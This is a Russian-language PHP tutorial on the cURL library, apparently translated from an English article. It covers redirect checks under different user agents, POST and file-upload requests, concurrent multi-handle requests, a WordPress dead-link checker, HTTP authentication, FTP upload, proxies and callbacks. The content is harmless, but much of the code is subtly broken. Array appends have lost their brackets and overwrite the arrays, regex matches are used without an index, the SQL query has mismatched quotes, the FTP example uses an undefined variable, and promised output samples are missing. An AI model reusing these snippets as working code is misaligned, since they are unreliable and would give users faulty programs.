// тестируем URL $urls = array("http://www.cnn.com", "http://www.mozilla.com", "http://www.facebook.com"); // тестируем браузеры $browsers = array("standard" => array ("user_agent" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)", "language" => "en-us,en;q=0.5"), "iphone" => array ("user_agent" => "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A537a Safari/419.3", "language" => "en"), "french" => array ("user_agent" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727)", "language" => "fr,fr-FR;q=0.5")); foreach ($urls as $url) { echo "URL: $url\n"; foreach ($browsers as $test_name => $browser) { $ch = curl_init(); // указываем url curl_setopt($ch, CURLOPT_URL, $url); // указываем заголовки для браузера curl_setopt($ch, CURLOPT_HTTPHEADER, array("User-Agent: {$browser["user_agent"]}", "Accept-Language: {$browser["language"]}")); // нам не нужно содержание страницы curl_setopt($ch, CURLOPT_NOBODY, 1); // нам необходимо получить HTTP заголовки curl_setopt($ch, CURLOPT_HEADER, 1); // возвращаем результаты вместо вывода curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); // был ли HTTP редирект? if (preg_match("!Location: (.*)!", $output, $matches)) { echo "$test_name: redirects to $matches\n"; } else { echo "$test_name: no redirection\n"; } } echo "\n\n"; }

Сначала мы указываем список URL сайтов, которые будем проверять. Точнее, нам понадобятся адреса данных сайтов. Далее нам необходимо определить настройки браузера, чтобы протестировать каждый из этих URL. После этого мы воспользуемся циклом, в котором пробежимся по всем полученным результатам.

Приём, который мы используем в этом примере для того, чтобы задать настройки cURL, позволит нам получить не содержание страницы, а только HTTP-заголовки (сохраненные в $output). Далее, воспользовавшись простым regex, мы можем определить, присутствовала ли строка “Location:” в полученных заголовках.

Когда вы запустите данный код, то должны будете получить примерно следующий результат:

Создание POST запроса на определённый URL

При формировании GET запроса передаваемые данные могут быть переданы на URL через “строку запроса”. Например, когда Вы делаете поиск в Google, критерий поиска располагаются в адресной строке нового URL:

Http://www.google.com/search?q=ruseller

Для того чтобы сымитировать данный запрос, вам не нужно пользоваться средствами cURL. Если лень вас одолевает окончательно, воспользуйтесь функцией “file_get_contents()”, для того чтобы получить результат.

Но дело в том, что некоторые HTML-формы отправляют POST запросы. Данные этих форм транспортируются через тело HTTP запроса, а не как в предыдущем случае. Например, если вы заполнили форму на форуме и нажали на кнопку поиска, то скорее всего будет совершён POST запрос:

Http://codeigniter.com/forums/do_search/

Мы можем написать PHP скрипт, который может сымитировать этот вид URL запроса. Сначала давайте создадим простой файл для принятия и отображения POST данных. Назовём его post_output.php:

Print_r($_POST);

Затем мы создаем PHP скрипт, чтобы выполнить cURL запрос:

$url = "http://localhost/post_output.php"; $post_data = array ("foo" => "bar", "query" => "Nettuts", "action" => "Submit"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // указываем, что у нас POST запрос curl_setopt($ch, CURLOPT_POST, 1); // добавляем переменные curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); $output = curl_exec($ch); curl_close($ch); echo $output;

При запуске данного скрипта вы должны получить подобный результат:

Таким образом, POST запрос был отправлен скрипту post_output.php, который в свою очередь, вывел суперглобальный массив $_POST, содержание которого мы получили при помощи cURL.

Загрузка файла

Сначала давайте создадим файл для того, чтобы сформировать его и отправить файлу upload_output.php:

Print_r($_FILES);

А вот и код скрипта, который выполняет указанный выше функционал:

$url = "http://localhost/upload_output.php"; $post_data = array ("foo" => "bar", // файл, который необходимо загрузить "upload" => "@C:/wamp/www/test.zip"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); $output = curl_exec($ch); curl_close($ch); echo $output;

Когда вы хотите загрузить файл, все, что вам нужно сделать, так это передать его как обычную post переменную, предварительно поместив перед ней символ @. При запуске написанного скрипта вы получите следующий результат:

Множественный cURL

Одной из самых сильных сторон cURL является возможность создания "множественных" cURL обработчиков. Это позволяет вам открывать соединение к множеству URL одновременно и асинхронно.

В классическом варианте cURL запроса выполнение скрипта приостанавливается, и происходит ожидание завершения операции URL запроса, после чего работа скрипта может продолжиться. Если вы намереваетесь взаимодействовать с целым множеством URL, это приведёт к довольно-таки значительным затратам времени, поскольку в классическом варианте вы можете работать только с одним URL за один раз. Однако, мы можем исправить данную ситуацию, воспользовавшись специальными обработчиками.

Давайте рассмотрим пример кода, который я взял с php.net:

// создаём несколько cURL ресурсов $ch1 = curl_init(); $ch2 = curl_init(); // указываем URL и другие параметры curl_setopt($ch1, CURLOPT_URL, "http://lxr.php.net/"); curl_setopt($ch1, CURLOPT_HEADER, 0); curl_setopt($ch2, CURLOPT_URL, "http://www.php.net/"); curl_setopt($ch2, CURLOPT_HEADER, 0); //создаём множественный cURL обработчик $mh = curl_multi_init(); //добавляем несколько обработчиков curl_multi_add_handle($mh,$ch1); curl_multi_add_handle($mh,$ch2); $active = null; //выполнение do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); while ($active && $mrc == CURLM_OK) { if (curl_multi_select($mh) != -1) { do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); } } //закрытие curl_multi_remove_handle($mh, $ch1); curl_multi_remove_handle($mh, $ch2); curl_multi_close($mh);

Идея состоит в том, что вы можете использовать множественные cURL обработчики. Используя простой цикл, вы можете отследить, какие запросы ещё не выполнились.

В этом примере есть два основных цикла. Первый цикл do-while вызывает функцию curl_multi_exec(). Эта функция не блокируемая. Она выполняется с той скоростью, с которой может, и возвращает состояние запроса. Пока возвращенное значение является константой ‘CURLM_CALL_MULTI_PERFORM’, это означает, что работа ещё не завершена (например, в данный момент происходит отправка http заголовков в URL); Именно поэтому мы продолжаем проверять это возвращаемое значение, пока не получим другой результат.

В следующем цикле мы проверяем условие, пока переменная $active = "true". Она является вторым параметром для функции curl_multi_exec(). Значение данной переменной будет равно "true", до тех пор, пока какое-то из существующих изменений является активным. Далее мы вызываем функцию curl_multi_select(). Её выполнение "блокируется", пока существует хоть одно активное соединение, до тех пор, пока не будет получен ответ. Когда это произойдёт, мы возвращаемся в основной цикл, чтобы продолжить выполнение запросов.

А теперь давайте применим полученные знания на примере, который будет реально полезным для большого количества людей.

Проверяем ссылки в WordPress

Представьте себе блог с огромным количеством постов и сообщений, в каждом из которых есть ссылки на внешние интернет ресурсы. Некоторые из этих ссылок по различным причинам могли бы уже быть «мертвыми». Возможно, страница была удалена или сайт вовсе не работает.

Мы собираемся создать скрипт, который проанализирует все ссылки и найдёт незагружающиеся веб-сайты и страницы 404, после чего предоставит нам подробнейший отчёт.

Сразу же скажу, что это не пример создания плагина для WordPress. Это всего на всего хороший полигон для наших испытаний.

Давайте же наконец начнём. Сначала мы должны сделать выборку всех ссылок из базы данных:

// конфигурация $db_host = "localhost"; $db_user = "root"; $db_pass = ""; $db_name = "wordpress"; $excluded_domains = array("localhost", "www.mydomain.com"); $max_connections = 10; // инициализация переменных $url_list = array(); $working_urls = array(); $dead_urls = array(); $not_found_urls = array(); $active = null; // подключаемся к MySQL if (!mysql_connect($db_host, $db_user, $db_pass)) { die("Could not connect: " . mysql_error()); } if (!mysql_select_db($db_name)) { die("Could not select db: " . mysql_error()); } // выбираем все опубликованные посты, где есть ссылки $q = "SELECT post_content FROM wp_posts WHERE post_content LIKE "%href=%" AND post_status = "publish" AND post_type = "post""; $r = mysql_query($q) or die(mysql_error()); while ($d = mysql_fetch_assoc($r)) { // делаем выборку ссылок при помощи регулярных выражений if (preg_match_all("!href=\"(.*?)\"!", $d["post_content"], $matches)) { foreach ($matches as $url) { $tmp = parse_url($url); if (in_array($tmp["host"], $excluded_domains)) { continue; } $url_list = $url; } } } // убираем дубликаты $url_list = array_values(array_unique($url_list)); if (!$url_list) { die("No URL to check"); }

Сначала мы формируем конфигурационные данные для взаимодействия с базой данных, далее пишем список доменов, которые не будут участвовать в проверке ($excluded_domains). Также мы определяем число, характеризующее количество максимальных одновременных соединений, которые мы будем использовать в нашем скрипте ($max_connections). Затем мы присоединяемся к базе данных, выбираем посты, которые содержат ссылки, и накапливаем их в массив ($url_list).

Следующий код немного сложен, так что разберитесь в нём от начала до конца:

// 1. множественный обработчик $mh = curl_multi_init(); // 2. добавляем множество URL for ($i = 0; $i < $max_connections; $i++) { add_url_to_multi_handle($mh, $url_list); } // 3. инициализация выполнения do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); // 4. основной цикл while ($active && $mrc == CURLM_OK) { // 5. если всё прошло успешно if (curl_multi_select($mh) != -1) { // 6. делаем дело do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); // 7. если есть инфа? if ($mhinfo = curl_multi_info_read($mh)) { // это значит, что запрос завершился // 8. извлекаем инфу $chinfo = curl_getinfo($mhinfo["handle"]); // 9. мёртвая ссылка? if (!$chinfo["http_code"]) { $dead_urls = $chinfo["url"]; // 10. 404? } else if ($chinfo["http_code"] == 404) { $not_found_urls = $chinfo["url"]; // 11. рабочая } else { $working_urls = $chinfo["url"]; } // 12. чистим за собой curl_multi_remove_handle($mh, $mhinfo["handle"]); // в случае зацикливания, закомментируйте данный вызов curl_close($mhinfo["handle"]); // 13. добавляем новый url и продолжаем работу if (add_url_to_multi_handle($mh, $url_list)) { do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); } } } } // 14. завершение curl_multi_close($mh); echo "==Dead URLs==\n"; echo implode("\n",$dead_urls) . "\n\n"; echo "==404 URLs==\n"; echo implode("\n",$not_found_urls) . "\n\n"; echo "==Working URLs==\n"; echo implode("\n",$working_urls); function add_url_to_multi_handle($mh, $url_list) { static $index = 0; // если у нас есть ещё url, которые нужно достать if ($url_list[$index]) { // новый curl обработчик $ch = curl_init(); // указываем url curl_setopt($ch, CURLOPT_URL, $url_list[$index]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_NOBODY, 1); curl_multi_add_handle($mh, $ch); // переходим на следующий url $index++; return true; } else { // добавление новых URL завершено return false; } }

Тут я попытаюсь изложить всё по полочкам. Числа в списке соответствуют числам в комментарии.

1. Создаём множественный обработчик;
2. Функцию add_url_to_multi_handle() мы напишем чуть позже. Каждый раз, когда она будет вызываться, начнётся обработка нового url. Первоначально, мы добавляем 10 ($max_connections) URL;
3. Для того чтобы начать работу, мы должны запустить функцию curl_multi_exec(). До тех пор, пока она будет возвращать CURLM_CALL_MULTI_PERFORM, нам ещё есть, что делать. Это нам нужно, главным образом, для того, чтобы создать соединения;
4. Далее следует основной цикл, который будет выполняться до тех пор, пока у нас есть хоть одно активное соединение;
5. curl_multi_select() зависает в ожидании, пока поиск URL не завершится;
6. И снова мы должны заставить cURL выполнить некоторую работу, а именно, сделать выборку данных возвращаемого ответа;
7. Тут происходит проверка информации. В результате выполнения запроса будет возвращён массив;
8. В возвращенном массиве присутствует cURL обработчик. Его мы и будем использовать для того, чтобы выбрать информацию об отдельном cURL запросе;
9. Если ссылка была мертва, или время выполнения скрипта вышло, то нам не следует искать никакого http кода;
10. Если ссылка возвратила нам страницу 404, то http код будет содержать значение 404;
11. В противном случае, перед нами находится рабочая ссылка. (Вы можете добавить дополнительные проверки на код ошибки 500 и т.д...);
12. Далее мы удаляем cURL обработчик, потому что больше в нём не нуждаемся;
13. Теперь мы можем добавить другой url и запустить всё то, о чём говорили до этого;
14. На этом шаге скрипт завершает свою работу. Мы можем удалить всё, что нам не нужно и сформировать отчет;
15. В конце концов, напишем функцию, которая будет добавлять url в обработчик. Статическая переменная $index будет увеличиваться каждый раз, когда данная функция будет вызвана.

Я использовал данный скрипт на своем блоге (с некоторыми неработающими ссылками, которые добавил нарочно для того, чтобы протестировать его работу) и получил следующий результат:

В моём случае, скрипту потребовалось чуть меньше чем 2 секунды, чтобы пробежаться по 40 URL. Увеличение производительности является существенным при работе с еще большим количеством URL адресов. Если вы открываете десять соединений одновременно, то скрипт может выполниться в десять раз быстрее.

Пару слов о других полезных опциях cURL

HTTP Аутентификация

Если на URL адресе есть HTTP аутентификация, то вы без труда можете воспользоваться следующим скриптом:

$url = "http://www.somesite.com/members/"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // указываем имя и пароль curl_setopt($ch, CURLOPT_USERPWD, "myusername:mypassword"); // если перенаправление разрешено curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // то сохраним наши данные в cURL curl_setopt($ch, CURLOPT_UNRESTRICTED_AUTH, 1); $output = curl_exec($ch); curl_close($ch);

FTP загрузка

В PHP также существует библиотека для работы с FTP, но вам ничего не мешает и тут воспользоваться средствами cURL:

// открываем файл $file = fopen("/path/to/file", "r"); // в url должно быть следующее содержание $url = "ftp://username:[email protected]:21/path/to/new/file"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); curl_setopt($ch, CURLOPT_INFILESIZE, filesize("/path/to/file")); // указывам ASCII мод curl_setopt($ch, CURLOPT_FTPASCII, 1); $output = curl_exec($ch); curl_close($ch);

Используем Прокси

Вы можете выполнить свой URL запрос через прокси:

$ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://www.example.com"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // указываем адрес curl_setopt($ch, CURLOPT_PROXY, "11.11.11.11:8080"); // если необходимо предоставить имя пользователя и пароль curl_setopt($ch, CURLOPT_PROXYUSERPWD,"user:pass"); $output = curl_exec($ch); curl_close ($ch);

Функции обратного вызова

Также существует возможность указать функцию, которая будет срабатывать ещё до завершения работы cURL запроса. Например, пока содержание ответа загружается, вы можете начать использовать данные, не дожидаясь полной загрузки.

$ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://net.tutsplus.com"); curl_setopt($ch, CURLOPT_WRITEFUNCTION,"progress_function"); curl_exec($ch); curl_close ($ch); function progress_function($ch,$str) { echo $str; return strlen($str); }

Подобная функция ДОЛЖНА возвращать длину строки, что является обязательным требованием.